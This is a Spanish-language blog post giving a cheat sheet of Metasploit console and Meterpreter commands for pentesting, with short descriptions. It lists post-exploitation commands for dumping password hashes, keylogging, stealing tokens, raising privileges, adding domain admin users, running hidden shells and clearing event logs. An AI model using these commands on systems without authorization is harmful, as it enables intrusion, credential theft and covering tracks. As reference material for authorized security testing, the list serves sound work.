El framework Metasploit es una herramienta de código abierto desarrollada en ruby, podéis incluso añadir vuestros propios desarrollos en ella (si no sabéis como apuntaos a nuestro curso de hacking ético). Esta herramienta es muy utilizada para realizar pentesting, tanto para comprometer sistemas como para obtener datos antes y después de comprometerlo.
Pero Metasploit tiene muchos comandos y como nuestra cabeza muchas veces no da para más (al menos la mía), necesitamos una chuleta para recordarlos, aquí os dejo una.
Comandos de la consola de metasploit
| show exploits | Mostrar todos los exploits del Framework. |
| show payloads |
Mostrar todos los payloads del Framework. |
| show auxiliary | Mostrar todos los módulos auxiliares del Framework. |
| search [cadena] | Búsqueda por cadena |
| search type:[exploit, payload, auxiliary, encoder, post] [cadena] | Búsqueda por tipo y cadena |
| info | Muestra información acerca de un exploit cargado. |
| use [cadena] | Carga el exploit indicado. |
| LHOST | Variable local host |
| RHOST | Variable host remoto |
| set [parámetro] [valor] | Graba en el parámetro el valor indicado. |
| setg[parámetro] [valor] | Graba en valor para el parámetro indicado de forma global. |
| show options | Muestra las opciones de un exploit. |
| show targets | Muestra las plataformas objetivo del exploit. |
| set target [número] | Especifica un objetivo concreto de los posibles. |
| set payload [payload] | Especifica un payload a usar.. |
| show advanced | Muestra las opciones avanzadas. |
| set autorunscript migrate -f | Migra el proceso a un hilo independiente de forma automática. |
| check | Comprueba si un objetivo es vulnerable a un exploit. |
| exploit | Ejecuta un exploit |
| exploit -j | Ejecuta un exploit en background. |
| exploit -z | No interactúa con la sesión después de acceder con éxito |
| exploit -e encoder | Especifica el encoder a usar con el payload |
| exploit -h | Muestra la ayuda para el exploit especificado |
| sessions -l | Muestra la lista de sesiones disponibles |
| sessions -l -v | Muestra la lista de sesiones disponibles en modo verbose |
| sessions -s [script] | Ejecuta un script específico en todas las sesiones de meterpreter activas. |
| sessions -K | Mata todas las sesiones activas |
| sessions -c cmd | Ejecuta un comando en todas las sesiones activas |
| sessions -u sessionID | Actualiza una shell de Win32 a una consola de meterpreter |
| db_create [nombre] | Crea una base de datos |
| db_connect [nombre] | Crea y se conecta a una base de datos |
| db_nmap | Usa y carga los resultados de Nmap en una base de datos |
| db_autopwn -h | Muestra la ayuda para usar db_autopwn. |
| db_autopwn -p -r -e | Ejecuta db_autopwn contra todos los puertos encontrados, usa una shell reversa y los explota. |
| db_destroy | Elimina la actual base de datos |
| db_destroy [usuario]:[contraseña]@[host]:[puerto]/[base_de_datos] | Borra una base de datos concreta |
Comandos de Meterpreter
| help | Muestra la ayuda. |
| run [script] |
Ejecuta un script de meterpreter |
| sysinfo | Muestra la información del sistema comprometido |
| ls | Muestra los ficheros y directorios del sistema comprometido |
| use priv | Carga librerías para elevar privilegios |
| ps | Muestra los procesos en ejecución |
| migrate PID | Migra un proceso específico. |
| use incognito | Carga las librerías de incógnito. |
| list_tokens -u | Muestra los tokens disponibles por usuario |
| list_tokens -g | Muestra los tokens disponibles por grupo |
| impersonate_token [dominio]\\[usuario] | Apropiación de un token disponible del objetivo. |
| steal_token PID | Apropiación de un token disponible de un proceso dado |
| drop_token | Deja de usar el token actual |
| getsystem | Intenta elevar los privilegios del usuario de acceso. |
| shell | Ejecuta una Shell interactiva |
| execute -f cmd.exe -i | Ejecuta cmd.exe e interactúa con él |
| execute -f cmd.exe -i -t | Ejecuta cmd.exe con todos los tokens disponibles |
| execute -f cmd.exe -i -H -t | Ejecuta cmd.exe con todos los tokens disponibles y lo convierte en un proceso oculto. |
| rev2self | Retorna al usuario original que comprometió el sistema |
| reg [comando] | Ejecuta comandos en el registro del sistema comprometido |
| setdesktop [número] | Cambia de pantalla |
| screenshot | Toma una captura de pantalla del objetivo |
| upload file | Carga un fichero en el objetivo |
| download file | Descarga un fichero del objetivo |
| keyscan_start | Comienza el sniffing del teclado. |
| keyscan_dump | Vuelca las teclas pulsadas del sistema objetivo. |
| keyscan_stop | Para el sniffing del teclado. |
| getprivs | Intenta elevar privilegios. |
| uictl enable keyboard/mouse | Toma el control del teclado o ratón. |
| background | Sale de meterpreter sin cerrar la sesión. |
| hashdump | Obtiene todos los hashes del objetivo. |
| use sniffer | Carga las librerías para esnifar. |
| sniffer_interfaces | Lista los interfaces disponibles. |
| sniffer_dump [interfaceID] pcapname | Comienza a esnifar un interfaz. |
| sniffer_start [interfaceID] packet-buffer | Comienza a esnifar un rango específico. |
| sniffer_stats [interfaceID] | Para obtener estadísticas de la interfaz. |
| sniffer_stop interfaceID | Detiene el sniffer. |
| add_user [usuario] [contraseña] -h [ip] | Añade un usuario en el sistema objetivo. |
| add_group_user "Domain Admins" [usuario] -h [ip] | Añade un usuario al grupo de administradores en el sistema objetivo. |
| clearev | Vacía el log de eventos del sistema comprometido |
| timestomp | Cambia los atributos de un fichero. |
| reboot | Reinicia el sistema |
Y eso es todo, ¿son unos cuantos eh?
Always Learning.